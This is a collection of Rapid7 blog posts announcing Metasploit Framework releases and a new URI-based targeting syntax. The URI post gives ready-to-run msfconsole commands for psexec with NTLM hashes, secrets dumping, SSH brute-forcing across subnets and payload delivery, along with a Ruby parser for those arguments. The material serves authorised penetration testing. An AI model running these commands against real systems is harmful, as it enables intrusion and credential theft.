
Metasploit Wrap-Up

Post Syndicated from Erran Carey original https://blog.rapid7.com/2021/10/01/metasploit-wrap-up-132/

Credential gatherers, mix-ins, oh my!


We’re excited that Metasploit now includes support for 28 related post modules for gathering credentials, based on the PackRat toolset. This is a continuation of #5433, #11700, and #11719. It was developed by community contributors Kazuyoshi Maruta, Daniel Hallsworth and Barwar Salim M as their final-year projects at Leeds Beckett University, with guidance, code clean-up and some additions by Z. Cliffe Schreuders.

We thank these community contributors for their months of effort and patience while getting so many modules through the code review process.

Netgear PNPX_GetShareFolderList Authentication Bypass

This auxiliary module exploits an authentication bypass in a range of different Netgear router models and firmware versions. The module leverages this vulnerability to log in as the admin user and then achieves a telnet session as root through the auxiliary/scanner/telnet/telnet_login module.

Read more about the SSD Netgear D7000 authentication bypass advisory here.

New module content (30)

  • Netgear PNPX_GetShareFolderList Authentication Bypass by Grant Willcox and Unknown – The auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass module exploits an authentication bypass in various Netgear router models running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The module leverages the vulnerability to log in as the admin user and then achieves a telnet session as the root user through the auxiliary/scanner/telnet/telnet_login module.
  • ECU Hard Reset by Jay Turla – Adds a new ecu_hard_reset hardware module which performs a hard reset through the ECU Reset service identifier (0x11).
  • 28 "PackRat" credential gatherers by Barwar Salim M, Daniel Hallsworth, Kazuyoshi Maruta (@KazuCyber), and Z. Cliffe Schreuders (@cliffe) – This pull request adds 28 post-exploitation modules, based on a common mixin, known as PackRat, which gathers file and information artifacts from end users’ systems.
    • Aim credential gatherer
    • Chrome credential gatherer
    • Comodo credential gatherer
    • Coolnovo credential gatherer
    • Digsby credential gatherer
    • Flock credential gatherer
    • Gadugadu credential gatherer
    • ICQ credential gatherer
    • Ie credential gatherer
    • Incredimail credential gatherer
    • KakaoTalk credential gatherer
    • Kmeleon credential gatherer
    • LINE credential gatherer
    • Maxthon credential gatherer
    • Miranda credential gatherer
    • Opera credential gatherer
    • Operamail credential gatherer
    • Postbox credential gatherer
    • QQ credential gatherer
    • Safari credential gatherer
    • Seamonkey credential gatherer
    • Srware credential gatherer
    • Tango credential gatherer
    • Thunderbird credential gatherer
    • Tlen credential gatherer
    • Viber credential gatherer
    • Windows Live Mail credential gatherer
    • Xchat credential gatherer

Enhancements and features

  • #15441 from bf9114 – This change extends the Meterpreter search functionality by adding the ability to search by modified date across all supported Meterpreter platforms. This allows a user to quickly find files on a target system that have been modified recently, or within a specific date range.
  • #15594 from h00die – This adds options to the wordpress_scanner that enable the user to only scan for WordPress themes or plugins that Metasploit has modules for.
  • #15630 from zeroSteiner – This adds the option DB_SKIP_EXISTING to the AuthBrute mixin to give users the option to skip credentials already in the database when performing brute force attacks.
  • #15669 from adfoster-r7 – Updates the multi/manage/screenshare module to use the Espia screenshot capabilities if present, and to gracefully fall back to the normal screenshot behavior if Espia fails to load as expected.
  • #15721 from zeroSteiner – Support has been added into Metasploit for negotiating SSL connections over multiple connection types, including Meterpreter and SSH. As a result, users can now make HTTPS requests over pivoted sessions. Previously, if users tried to make such connections, they would be sent in plaintext instead of being SSL encrypted.
  • #15722 from adfoster-r7 – The rerun command has been enhanced to support tab completion.
  • #15726 from zeroSteiner – This adds the MeterpreterTryToFork option to the Mettle payloads. When set, it translates to Mettle’s :background option. When :persist is not configured, it will attempt to fork the stage into the background.

Bugs fixed

  • #15703 from space-r7 – This updates payload/windows/x64/encrypted_shell/reverse_tcp to no longer crash on macOS. It additionally adds an advanced option, ShowCompileCMD, that prints the compilation command used.
  • #15720 from NeffIsBack – This fixes a bug where the rhost value was incorrectly passed to the underlying scanning script, resulting in an abnormal exit.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/09/24/metasploit-wrap-up-131/

Vulnerability is in the eye of the beholder


Exploiting firmware authored by UDP Technology and provided to multiple large OEMs (including Geutebruck), community contributor TrGFxX has authored a neat module that allows RCE as root on machines running the web interface of the Geutebruck G-Cam and G-Code products. For more information on the vulnerability, check out the CISA advisory.

OpManager exploit is OP plz nerf

Our very own zeroSteiner authored a module implementing both an exploit and patch bypass for a Java deserialization vulnerability that exists in numerous versions of ManageEngine’s OpManager software. This module allows payload execution as either NT AUTHORITY\SYSTEM on Windows or root on Linux. On top of this new module, zeroSteiner made improvements to help utilize the increasingly essential YSoSerial tool. You should definitely check it out if you’re interested in exploring other Java deserialization vulns.

Putting the Win in WinRM

In a big win for Metasploit, community contributor smashery finished off their month-long effort to get fully functional shells working across WinRM! These new sessions support post modules, NTLMSSP authentication, and are also able to run without a payload in remote memory, making these sessions pretty hard to detect. This is a major improvement over the previous WinRM implementation that only supported execution of a single command, so huge thanks again to smashery.

You can tell a lot about a protocol from its handshake

In one final noteworthy addition, smashery has once again come through with a PR that significantly improves our RDP library. Metasploit users can now capture the NetBIOS computer name, NetBIOS domain name, DNS computer name, DNS domain name, and OS version from the NTLM handshake carried out over RDP, and our rdp_scanner module has been updated to display this info to all the RDP sniffers out there.

New module content (3)

Enhancements and features

  • #15684 from adfoster-r7 – This improves interactive shell performance for pasted user input.
  • #15696 from smashery – This updates the RDP scanner module to extract and show additional information gathered from the NTLM handshake used for Network Level Authentication (NLA).
  • #15632 from smashery – This improves Metasploit’s WinRM capabilities by allowing shell sessions to be established over the protocol. The shell sessions are interactive and are usable with post modules.

Bugs fixed

  • #15600 from agalway-r7 – This fixes an issue with encrypted payloads during session setup. The logic that gathers session info is now located in the bootstrap method, which ensures that this functionality is always carried out before any commands are sent.
  • #15666 from timwr – This fixes an issue found in Meterpreter’s download functionality where downloading a file with a name containing unicode characters would fail due to incompatible encoding.
  • #15679 from nvn1729 – This fixes a bug where the tomcat_mgr_upload module was not correctly undeploying the app after exploitation occurred.
  • #15686 from jmartin-r7 – This fixes a crash in msfrpc that occurs due to the exploit/linux/misc/saltstack_salt_unauth_rce module’s MINIONS option default being a regex instead of a string.
  • #15695 from adfoster-r7 – This fixes a crash in the exploit/unix/local/setuid_nmap module and adds logging to print the result of the exploit’s last command so the user knows what happened in the event of a failure.
  • #15697 from smashery – This updates the HTTP NTLM information enumeration module to use the Net::NTLM library for consistent data processing without a custom parser.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Easier URI Targeting With Metasploit Framework

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/09/23/metasploit-uri-support/

Easier URI Targeting With Metasploit Framework

Over the past year and a half, Metasploit Framework’s core engineering team in Belfast has made significant improvements to usability, discoverability, and the general quality of life for the global community of Framework users. A few of the enhancements we’ve worked on in MSF 6 include:

  • A handy tip command in msfconsole that delivers tips n’ tricks to users
  • Consolidated EternalBlue modules that removed the need for Python as a dependency, as well as automatic targeting support
  • AutoCheck support, which runs a module’s check functionality before its exploit capabilities are executed to ensure the module will work, as well as a ForceExploit advanced option that allows a user to override this behaviour
  • A debug command in msfconsole that provides data to help users understand the root cause of issues
  • Improved cross-platform support for msfdb, as well as supporting external databases — such as using a PostgreSQL Docker container
  • User experience improvements, including word-wrapping tables, highlighting matched search terms in the search table, and introducing context-aware hints — such as letting users know that they can use the use command to easily select a searched module
  • Reducing msfconsole’s boot time, as well as reducing the time required to search for modules, and list exploits/payloads in both the console and module.search RPC calls

Today’s blog looks at another series of improvements that have overhauled Framework’s option support to allow for streamlined workflows when specifying multiple module options for protocols like HTTP, MySQL, PostgreSQL, SMB, SSH, and more. This removes the need to individually call set for each module option value before running it — courtesy of pull request #15253.

Overview

Traditional usage of Metasploit involves loading a module and setting multiple options:

use exploit/linux/postgres/postgres_payload
set username administrator
set password pass
set rhost 192.168.123.6
set rport 5432
set database postgres
set lhost 192.168.123.1
set lport 5000
run

You could also specify multiple RHOSTS separated by spaces, or with a CIDR subnet mask:

set rhosts 127.0.0.1 127.0.0.2
set rhosts 127.0.0.1/24

URI support for RHOSTS

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload
run postgres://administrator:pass@192.168.123.6 lhost=192.168.123.1 lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters.

SMB examples

There’s a full page of documentation and examples in the Metasploit Wiki, but here are a few highlights that show the improvements.

Running psexec against a target host:

use exploit/windows/smb/psexec
run smb://user:<password>@<rhost> lhost=192.168.123.1 lport=5000
run "smb://user:pass with spaces@<rhost>" lhost=192.168.123.1 lport=5000

Running psexec with NTLM hashes:

use exploit/windows/smb/psexec
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:<nt_hash>@<rhost> lhost=10.10.14.13 lport=5000

Dumping secrets with NTLM hashes:

use auxiliary/gather/windows_secrets_dump
run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:<nt_hash>@<rhost>

Downloading a file:

use auxiliary/admin/smb/download_file
run smb://a:<password>@<rhost>/my_share/helloworld.txt

Uploading a file:

use auxiliary/admin/smb/upload_file
echo "my file" > local_file.txt
run smb://a:<password>@<rhost>/my_share/remote_file.txt lpath=./local_file.txt

SSH examples

If you have valid SSH credentials, the ssh_login module will open a Metasploit session for you:

use scanner/ssh/ssh_login
run ssh://user:<password>@<rhost>

Brute-forcing a host with a known user and a password list:

use scanner/ssh/ssh_login
run ssh://user@<rhost> threads=50 pass_file=./rockyou.txt

Brute-forcing credentials:

use scanner/ssh/ssh_login
run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt

Brute-forcing credentials across a subnet:

use scanner/ssh/ssh_login
run cidr:/24:ssh://user:<password>@<rhost> threads=50
run cidr:/24:ssh://user@<rhost> threads=50 pass_file=./rockyou.txt

It’s also now possible to port forward through a Metasploit SSH session:

route add 172.18.103.0/24 ssh_session_id

More examples

Full details and examples can be found within the Metasploit Wiki. At the time of release, the following protocols are now supported:

  • cidr – Can be combined with other protocols to apply a subnet mask to the address
  • length
  • file – Load a series of RHOST values separated by newlines from a file (this file can also include URI strings)
  • http
  • https
  • mysql
  • postgres
  • smb
  • ssh
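As an added illustration (not Framework’s own implementation, whose parsing lives in Metasploit’s library code), here is a small Ruby parser for the run-argument style shown in this post: it turns a target URI plus key=value pairs into datastore option values, including the cidr: prefix and the one-host-per-line file: format listed above. The option names it emits and the way each scheme uses the URI path are assumptions modelled on the modules above.

```ruby
# Added example, not Metasploit's own implementation: a minimal parser for the
# `run <target-uri> key=value ...` argument style used above. The option names it
# emits (RHOSTS, RPORT, USERNAME, PASSWORD, SMBUSER, SMBPASS, SMBSHARE, RPATH,
# DATABASE, TARGETURI, SSL, ...) are assumptions modelled on the modules' options;
# Framework's datastore is case-insensitive, so keys are stored uppercased here.

# Assumed default port per supported protocol.
DEFAULT_PORTS = {
  'http' => 80, 'https' => 443, 'mysql' => 3306,
  'postgres' => 5432, 'smb' => 445, 'ssh' => 22
}.freeze

# scheme://[user[:password]@]host[:port][/path]. The userinfo group is greedy so a
# password may itself contain ':' (an LM:NT hash pair), spaces or '@'.
TARGET_URI_RE = %r{\A(?<scheme>[a-z][a-z0-9+.-]*)://(?:(?<userinfo>.*)@)?(?<host>\[[^\]]+\]|[^:/@\s]+)(?::(?<port>\d+))?(?<path>/\S*)?\z}

# Parse one target URI, optionally prefixed with cidr:/N:, into option values.
def parse_target(str)
  cidr = nil
  if (m = str.match(%r{\Acidr:/(\d{1,2}):(.*)\z}m))
    cidr = Integer(m[1])
    raise ArgumentError, "invalid subnet mask /#{cidr}" unless (0..32).cover?(cidr)
    str = m[2]
  end
  m = TARGET_URI_RE.match(str)
  raise ArgumentError, "not a target URI: #{str.inspect}" unless m
  scheme = m[:scheme]
  raise ArgumentError, "unsupported protocol: #{scheme}" unless DEFAULT_PORTS.key?(scheme)

  user, pass = m[:userinfo]&.split(':', 2)
  host = m[:host].delete_prefix('[').delete_suffix(']')
  opts = {
    'RHOSTS' => cidr ? "#{host}/#{cidr}" : host,
    'RPORT' => (m[:port] || DEFAULT_PORTS[scheme]).to_s
  }
  case scheme
  when 'smb'
    opts['SMBUSER'] = user if user
    opts['SMBPASS'] = pass if pass
    # smb://.../share/path/file maps to SMBSHARE and RPATH (download/upload modules)
    share, rpath = m[:path].to_s.delete_prefix('/').split('/', 2)
    opts['SMBSHARE'] = share unless share.to_s.empty?
    opts['RPATH'] = rpath if rpath
  when 'http', 'https'
    opts['SSL'] = (scheme == 'https').to_s
    opts['HTTPUSERNAME'] = user if user
    opts['HTTPPASSWORD'] = pass if pass
    opts['TARGETURI'] = m[:path] || '/'
  else # ssh, mysql, postgres
    opts['USERNAME'] = user if user
    opts['PASSWORD'] = pass if pass
    db = m[:path].to_s.delete_prefix('/')
    opts['DATABASE'] = db if scheme == 'postgres' && !db.empty?
  end
  opts
end

# One RHOST per line, bare address or target URI; blank lines are skipped.
# This is what the file: prefix loads from disk.
def parse_rhosts_lines(lines)
  lines.map(&:strip).reject(&:empty?).map do |line|
    line.include?('://') ? parse_target(line) : { 'RHOSTS' => line }
  end
end

# Parse the already shell-split arguments of `run ...`. Several targets are
# joined into one space-separated RHOSTS value; explicit key=value pairs are
# assumed to win over values derived from the URI.
def parse_run_args(args)
  targets = []
  explicit = {}
  args.each do |arg|
    if arg.start_with?('file:')
      targets.concat(parse_rhosts_lines(File.readlines(arg.delete_prefix('file:'))))
    elsif arg.include?('://')
      targets << parse_target(arg)
    elsif (m = arg.match(/\A([A-Za-z_]\w*)=(.*)\z/m))
      explicit[m[1].upcase] = m[2]
    else
      raise ArgumentError, "unrecognised argument: #{arg.inspect}"
    end
  end
  datastore = {}
  hosts = targets.map { |t| t.delete('RHOSTS') }
  targets.each { |t| datastore.merge!(t) }
  datastore['RHOSTS'] = hosts.join(' ') unless hosts.empty?
  datastore.merge(explicit)
end

if __FILE__ == $PROGRAM_NAME
  # The postgres_payload example from this post, expressed as parsed options.
  p parse_run_args(%w[postgres://administrator:pass@192.168.123.6 lhost=192.168.123.1 lport=5000])
end
```

Quoting of a password containing spaces is the console’s job before the arguments reach parse_run_args, which is why the parser takes an already split array.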


Metasploit Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2021/09/17/metasploit-wrap-up-130/


Clone your way to code execution


We’ve had a busy week bringing you exploits, features, enhancements, and fixes. Exploit modules for Git and elFinder lead the pack this week, with an information disclosure against Jira and a post-exploitation module targeting Geutebruck white-labelled cameras to freeze them like every movie ever!

Git push upstream git-lfs:payload

Our own Jack Hysel and Shelby Pace had some fun creating an exploit module targeting GitHub, originally discovered by Dawid Golunski. The exploit requires a user to clone an infected GitHub repository to gain remote code execution, and before you ask, we promise it is safe to clone ours.

Jira users

Brian Halbach and Mikhail Klyuchnikov sent us a nice module exploiting CVE-2020-14181 to get a list of Jira users, helping the social engineers among us find more targets and giving login scanners more data. Unfortunately, it does not track my tickets and keep them up to date.

New module content (4)

  • Jira Users Enumeration by Brian Halbach and Mikhail Klyuchnikov, which exploits CVE-2020-14181 – This obtains user names on Jira Server by exploiting an information disclosure vulnerability that exists at the /ViewUserHover.jspa endpoint.
  • elFinder Archive Command Injection by Shelby Pace and Thomas Chauchefoin, which exploits CVE-2021-32682 – This adds an exploit for CVE-2021-32682 which is an unauthenticated RCE in the elFinder PHP application. The vulnerability is due to a flaw that allows a malicious argument to be passed to the zip command when an archive action is performed.
  • Git Remote Code Execution via git-lfs (CVE-2020-27955) by Dawid Golunski, jheysel-r7, and space-r7, which exploits CVE-2020-27955 – This adds an exploit for CVE-2020-27955 which is a vulnerability in the Git version control system. The module can be used to execute code in the context of a user that can be convinced to clone a malicious repository.
  • Geutebruck Camera Deface by Ibrahim Ayadhi and Sébastien Charbonnier – A new post exploitation module has been added which allows one to take a session on a Geutebruck Camera shell and either freeze the current display stream, replace the current display stream with a static image, or restore the display stream such that it will display the current live feed from the camera.

Enhancements and features

  • #15609 from adfoster-r7 – Adds additional metadata to exploit modules to specify Meterpreter command requirements. This information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn’t support the required command functionality.
  • #15674 from digininja – Updates the Apache Tomcat Ghostcat module to correctly handle a larger range of possible success status codes when verifying whether the module has succeeded.

Bugs fixed

  • #15667 from bwatters-r7 – Fixes powershell_reverse_tcp file operations and updates the file operations test module.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Louis Sato original https://blog.rapid7.com/2021/09/10/metasploit-wrap-up-129/

Confluence Server OGNL Injection


Our own wvu, along with Jang, added a module that exploits an OGNL injection (CVE-2021-26804) in Atlassian Confluence’s WebWork component to execute commands as the Tomcat user. CVE-2021-26804 is a critical remote code execution vulnerability in Confluence Server and Confluence Data Center and is actively being exploited in the wild. Initial discovery of this vulnerability was by Benny Jacob (SnowyOwl).

More Enhancements

In addition to the module, we would like to highlight some of the enhancements that have been added for this release. Contributor e2002e added the OUTFILE and DATABASE options to the zoomeye_search module, allowing users to save results to a local file or the local database, and improved the module’s output to provide better information about the target. Our own dwelch-r7 has added support for fully interactive shells against Linux environments with shell -it. In order to use this functionality, users will have to enable the feature flag with features set fully_interactive_shells true. Contributor pingport80 has added PowerShell support for a binary-safe write_file method and has also replaced explicit cat calls with file reads from the file library to provide broader support.

New module content (1)

Enhancements and features

  • #15278 from e2002e – The zoomeye_search module has been enhanced to add the OUTFILE and DATABASE options, which allow users to save results to a local file or to the local database respectively. Additionally, the saved output has been improved to provide better information about the target, and additional error handling has been added to better handle potential edge cases.
  • #15522 from dwelch-r7 – Adds support for fully interactive shells against Linux environments with shell -it. This functionality is behind a feature flag and can be enabled with features set fully_interactive_shells true.
  • #15560 from pingport80 – This PR adds PowerShell support for the write_file method, which is binary safe.
  • #15627 from pingport80 – This PR removes explicit cat calls and replaces them with file reads from the file library so that they have broader support.

Bugs fixed

  • #15634 from maikthulhu – This PR fixes an issue in exploit/multi/misc/erlang_cookie_rce where a missing bitwise flag caused the exploit to fail in some circumstances.
  • #15636 from adfoster-r7 – Fixes a regression in datastore serialization that caused some event processing to fail.
  • #15637 from adfoster-r7 – Fixes a regression where Metasploit incorrectly marked IPv6 addresses as having an ‘invalid protocol’.
  • #15639 from gwillcox-r7 – This fixes a bug in the rename_files method that would occur when run on a non-Windows shell session.
  • #15640 from adfoster-r7 – Updates modules/auxiliary/gather/office365userenum.py to require python3.
  • #15652 from jmartin-r7 – A missing dependency, py3-pip, was preventing certain external modules such as auxiliary/gather/office365userenum from working, because requests requires py3-pip to run properly. This has been fixed by updating the Docker container to install the missing py3-pip dependency.
  • #15654 from space-r7 – A bug has been fixed in lib/msf/core/payload/windows/encrypted_reverse_tcp.rb whereby a call to recv() was not being passed the proper arguments to receive the full payload before returning. This could result in cases where only part of the payload was received before continuing, which would have resulted in a crash. This has been fixed by adding a flag to the recv() function call to ensure it receives the entire payload before returning.
  • #15655 from adfoster-r7 – This cleans up the MySQL client-side options that are used within the library code.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2021/09/03/metasploit-wrap-up-128/

Capture Credentials with our new SMB Server


Our own Adam Galway revamped the old SMB capture module, which now supports NTLMv1 and NTLMv2 as well as SMB1, SMB2 and SMB3. This was made possible by @zeroSteiner’s new RubySMB server implementation. Metasploit is now able to capture NTLM hashes from any recent Windows release using the SMB2 and SMB3 dialects, even with encrypted SMB traffic.

Revenge of the Clones

Earlier this year, an outstanding vulnerability in Git clients was disclosed and identified as CVE-2021-21300. It allows an attacker to execute scripts on the victim’s system when cloning a specially crafted repository onto a case-insensitive file system such as NTFS, HFS+ or APFS. Our own Shelby Pace just added a new exploit module that leverages this flaw to achieve remote code execution. First, the module creates a fake Git repository and waits for the victim to clone it. This process will deliver a post-checkout script with the payload that will be automatically executed upon checkout of the repository.

Note that for this exploit to work, the victim’s Git client must support delay-capable clean / smudge filters and symbolic links. The former is enabled by default on Windows through Git-lfs.

Don’t clone repositories you don’t trust!

Exploiting eBPF on Linux

A new local exploit module that leverages a bug in the Linux eBPF feature was added by Grant Willcox this week. This vulnerability is identified as CVE-2021-3490 and allows a local attacker to achieve code execution as the root user by conducting an out-of-bounds read and write in the Linux kernel. This is possible due to a flaw in the eBPF verifier’s verification of ALU32 operations. This module is based on @chompie1337’s PoC code and should work on any vulnerable kernel version (from 5.7-rc1 prior to 5.13-rc4, 5.12.4, 5.11.21, and 5.10.37). Note that, at the moment, it has only been tested on Ubuntu 20.04 (Focal Fossa) 5.8.x kernels prior to 5.8.0-53.60, Ubuntu 20.10 (Groovy Gorilla) 5.8.x kernels prior to 5.8.0-53.60, Ubuntu 21.04 (Hirsute Hippo) 5.11.x kernels prior to 5.11.0-17.18 and Fedora kernel versions 5.x from 5.7.x up to but not including 5.11.20-300. However, the module documentation includes some instructions for porting the exploit over onto other systems.

New module content (4)

  • Geutebruck Multiple Remote Command Execution by Ibrahim Ayadhi, Sébastien Charbonnier, and Titouan Lazard, which exploits CVE-2021-33554 – A new module has been added which bypasses authentication and exploits CVE-2021-33544, CVE-2021-33548, and CVE-2021-33550-33554 on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.
  • Linux eBPF ALU32 32-bit Invalid Bounds Tracking LPE by Grant Willcox, Manfred Paul, and chompie1337, which exploits ZDI-21-606 – This adds a module that uses @chompie1337’s CVE-2021-3490 PoC code to elevate privileges to root on affected Linux systems. It’s been tested to work on clean installs of Ubuntu 21.04, Ubuntu 20.10, Ubuntu 20.04.02, as well as Fedora running affected versions of the 5.7, 5.8, 5.9, 5.10 and 5.11 kernels.
  • Git LFS Clone Command Exec by Johannes Schindelin, Matheus Tavares, and Shelby Pace, which exploits CVE-2021-21300 – An exploit module has been added for CVE-2021-21300, a RCE vulnerability in affected Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems. Additionally, a set of mixins that aid in exploiting Git clients over the Smart HTTP protocol have been added into Metasploit and the code for older Git-related exploits has been updated to utilize some of this new code.
  • Overhaul SMB auth capture server from agalway-r7 – This updates the SMB capture server to be compatible with clients using the SMB 2 and SMB 3 dialects. SMB 1 has not been enabled in Windows 10 since v1709 was released in 2017. This allows the module to be compatible with recent releases.

Enhancements and features

  • #15253 from adfoster-r7 – Updates Metasploit to support URI arguments to set module datastore values. The currently supported protocols are http, smb, mysql, postgres, and ssh.
  • #15537 from adfoster-r7 – Adds support for Ruby 3.
  • #15582 from bcoles – The code for Msf::Post::Linux::Kernel.unprivileged_bpf_disabled? has been updated to support the new values of kernel.unprivileged_bpf_disabled introduced in Linux kernels since 5.13 and 5.14-rc+HEAD: the value 2 means unprivileged calls to bpf() are disabled, whereas the value 1 is now used to indicate unprivileged calls to bpf() are disabled without recovery.
  • #15606 from adfoster-r7 – Improves Python Meterpreter to gracefully handle unsupported command ids and to clean up process objects correctly. Additionally enhances mingw build support for Windows Meterpreter, and now correctly interprets a transport session time of 0 as never expiring.
  • #15621 from jmartin-r7 – Updates the Metasploit docker container to additionally include Go as a dependency.
  • #15623 from zeroSteiner – The creds command has been updated to support several new features: formatting NetNTLMv1 and NetNTLMv2 hashes for both the JtR and Hashcat formatters, filtering hashes based on the realm, not truncating hashes when writing them to a CSV file, filtering based on the JtR format type name, applying the same filtering to output files that can be applied when generating the creds table, and ensuring output consistency when writing output to a file.

Bugs fixed

  • #15375 from HynekPetrak – This PR fixes a bug whereby Metasploit would sometimes crash when remote LDAP servers returned a null character in the base_dn string, and also enhances modules/auxiliary/gather/ldap_hashdump.rb to handle sha256 hashes and skip hashes in cases of LK (locked account) and NP (no password) credentials.
  • #15572 from adfoster-r7 – This PR implements a fix to correctly handle quoted console options and whitespace.
  • #15573 from dwelch-r7 – The simplify_module function has been updated so that by default it will not load LHOST/RHOST from the config file and instead use the values set in the options.
  • #15590 from sjanusz-r7 – A bug has been fixed that prevented external modules from properly handling the encoding of UTF-8 characters.
  • #15596 from tomadimitrie – A bug has been fixed in docker_credential_wincred whereby the regex would sometimes match on IP addresses and other invalid entries instead of the expected Docker version string. This has now been fixed by tightening the regex to make it more specific and restrictive.
  • #15628 from timwr – Ensures the session table is refreshed whenever the sysinfo command is run, and whenever stdapi is loaded manually. This should also fix a minor bug where, if you run an exploit on an existing session, the session information never gets updated (e.g. the username from User -> SYSTEM). Now it’s refreshed when you run meterpreter > sysinfo.
  • #15629 from jmartin-r7 – Fixes a regression where msfconsole crashed on startup when running in a Windows environment.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Sonny Gonzalez original https://blog.rapid7.com/2021/08/27/metasploit-wrap-up-127/

LearnPress authenticated SQL injection


Metasploit contributor h00die added a new module that exploits CVE-2020-6010, an authenticated SQL injection vulnerability in the WordPress LearnPress plugin. When a user is logged in with contributor privileges or higher, the id parameter can be used to inject arbitrary code through an SQL query. This exploit can be used to collect usernames and password hashes. The responsible code is located in learnpress/inc/admin/lp-admin-functions.php at line 1690. The vulnerability affects plugin versions v3.2.6.7 and prior.

Continuous improvement

In addition to new exploit modules, Metasploit releases include a number of enhancements and bug fixes. This week we would like to highlight a few key enhancements that improve usability. Contributor pingport80 added support for easy reading of binary files from target systems compromised through a PowerShell session. Our very own sjanusz-r7 added a default payload option to the postgres_payload module so that payloads update correctly when changing target systems. An enhancement made by our own gwillcox-r7 extends Windows process lib injection beyond just notepad.exe. The logic now selects from a random list that can be updated in the future. We appreciate all the contributions that make Metasploit more robust and easier to use.

New module content (1)

Enhancements and features

  • #15384 from gwillcox-r7 – This consolidates and changes the library code used by exploits that use RDLLs. The changes improve upon the logic used to start a process to host the RDLL so it is no longer notepad.exe but randomly selected from a list that can also be updated in the future.
  • #15477 from pingport80 – This adds PowerShell session support to the readable? and read_file functions provided by the Post::File API.
  • #15580 from sjanusz-r7 – Updates postgres_payload exploit modules to specify a valid default PAYLOAD option when changing target architectures
  • #15584 from h00die – Updates the list of WordPress plugins and themes to allow users to discover more plugins and themes when running tools such as auxiliary/scanner/http/wordpress_scanner

Bugs fixed

  • #15496 from zeroSteiner – Users can now specify the SSL version for servers with the SSLVersion datastore option, ensuring compatibility with a range of targets old and new.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/

Anyone enjoy making chains?

The community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7’s own wvu & Spencer McIntyre added a module that implements the ProxyShell exploit chain originally demonstrated by Orange Tsai. The module also benefited from research and analysis by Jang, PeterJson, brandonshi123, and mekhalleh (RAMELLA Sébastien) to make it as simple as finding an email address for an administrator of a vulnerable version of Exchange as the entry point to chain CVE-2021-31207, CVE-2021-34523, & CVE-2021-34473 into sessions for everyone to enjoy.

Great to see some GSoC value in the wild.

With Google Summer of Code 2021 moving into its final phases, pingport80 had 4 PRs land in this week’s release. These improvements and fixes to interactions with sessions make post exploitation tasks more accessible, bringing the community more capabilities and stability along the way.

New module content (2)

Enhancements and features

  • #15540 from dwelch-r7 – This adds an option to cmd_execute to have the command run in a subshell by Meterpreter.
  • #15556 from pingport80 – This adds shell session compatibility to the post/windows/gather/enum_unattend module.
  • #15564 from pingport80 – This adds support to the get_env and command_exists? post API methods for Powershell session types.

Bugs fixed

  • #15303 from pingport80 – This PR ensures that the shell dir command returns a list.
  • #15332 from pingport80 – This improves localization support and compatibility in the session post API related to the rename_file method.
  • #15539 from tomadimitrie – This improves the OS version check in the check method of exploit/windows/local/cve_2018_8453_win32k_priv_esc.
  • #15546 from timwr – This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it’s valid first.
  • #15570 from adfoster-r7 – This fixes a bug in the auxiliary/scanner/smb/smb_enum_gpp module where the path that was being generated by the module caused an SMB exception to be raised.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2021/08/13/metasploit-wrap-up-125/

Print Driver PrivEsc

